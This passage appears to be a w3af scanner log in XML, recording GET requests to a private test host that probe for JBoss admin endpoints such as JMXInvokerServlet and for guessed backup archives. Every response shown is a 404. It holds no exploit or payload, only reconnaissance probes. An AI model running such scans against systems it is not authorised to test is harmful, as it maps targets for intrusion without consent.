    &lt;a href='jmx-console/'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="206">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/status HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about status has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='status'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="207">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/WebConsole/Invoker HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about WebConsole/Invoker has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='WebConsole/Invoker'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="208">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/invoker/JMXInvokerServlet HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html;charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="PHP/5.6.9" field="x-powered-by"/>
                    </headers>
                    <body content-encoding="text">    &lt;h2&gt;404 page not found!&lt;/h2&gt;

    &lt;p&gt;
        The article about invoker/JMXInvokerServlet has not been found, we
        are sorry for the inconvenience.
    &lt;/p&gt;
    &lt;a href='invoker/JMXInvokerServlet'&gt;reload the current page&lt;/a&gt;
</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="209">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/web-console/ServerInfo.jsp HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="559" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/web-console/ServerInfo.jsp&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="213">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="214">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="538" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="215">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="545" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="217">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="540" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="218">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="219">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="220">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="221">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.zip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.zip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="222">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="223">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="224">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.cab HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.cab&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="225">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.bzip2 HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="544" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.bzip2&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="226">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.7z HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="541" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.7z&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="227">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.rar HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.rar&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="228">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.gzip HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="543" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.gzip&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="230">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.68.tar.gz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="548" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.68.tar.gz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="231">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.12.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="542" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
h1 { font-size: 1.5em; font-weight: normal; background-color: #9999cc; min-height:2em; line-height:2em; border-bottom: 1px inset black; margin: 0; }
h1, p { padding-left: 10px; }
code.url { background-color: #eeeeee; font-family:monospace; padding:0 2px;}
&lt;/style&gt;
&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Not Found&lt;/h1&gt;&lt;p&gt;The requested resource &lt;code class=&quot;url&quot;&gt;/10.12.tgz&lt;/code&gt; was not found on this server.&lt;/p&gt;&lt;/body&gt;&lt;/html&gt;</body>
                </httpresponse>
            </http-transaction>
            <http-transaction id="232">
                <httprequest>
                    <status>GET http://10.12.68.25:31337/10.tgz HTTP/1.1</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="Host"/>
                        <header content="http://10.12.68.25:31337/" field="Referer"/>
                        <header content="gzip, deflate" field="Accept-encoding"/>
                        <header content="*/*" field="Accept"/>
                        <header content="w3af.org" field="User-agent"/>
                    </headers>
                </httprequest>
                <httpresponse>
                    <status>HTTP/1.1 404 Not Found</status>
                    <headers>
                        <header content="10.12.68.25:31337" field="host"/>
                        <header content="text/html; charset=UTF-8" field="content-type"/>
                        <header content="close" field="connection"/>
                        <header content="539" field="content-length"/>
                    </headers>
                    <body content-encoding="text">&lt;!doctype html&gt;&lt;html&gt;&lt;head&gt;&lt;title&gt;404 Not Found&lt;/title&gt;&lt;style&gt;
body { background-color: #fcfcfc; color: #333333; margin: 0; padding:0; }
